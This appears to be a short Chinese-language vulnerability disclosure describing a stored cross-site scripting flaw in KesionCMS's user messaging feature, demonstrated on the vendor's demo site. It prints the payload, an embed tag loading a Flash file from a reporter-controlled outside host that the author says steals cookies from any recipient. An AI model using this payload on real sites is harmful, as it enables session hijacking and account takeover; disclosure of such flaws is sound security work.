### 简要描述:
KesionCMS存储型xss漏洞可打任意用户
### 详细说明:
这里选择用KesionCMS官方体验地址http://demo.kesion.com/
该存储型xss漏洞存在于发送消息处
这里我们用bitcoin100向另外一个用户bitcoin发送消息,
发送消息时,在内容中插入xss代码
<embed code="/\\pujun.li/xss.swf" allowscriptaccess="always">
swf是我自己控制的,可以盗取cookies
未过滤这个代码 导致攻击任意账户
[<img src="https://images.seebug.org/upload/201406/2321415813bfc2c8e594e50932aea01b5b74ffcc.jpg" alt="22222222.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/2321415813bfc2c8e594e50932aea01b5b74ffcc.jpg)
[<img src="https://images.seebug.org/upload/201406/23214216f4a5b7e2968f1256b90189630cdfc86f.jpg" alt="3333333333333333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/23214216f4a5b7e2968f1256b90189630cdfc86f.jpg)
### 漏洞证明:
如上
暂无评论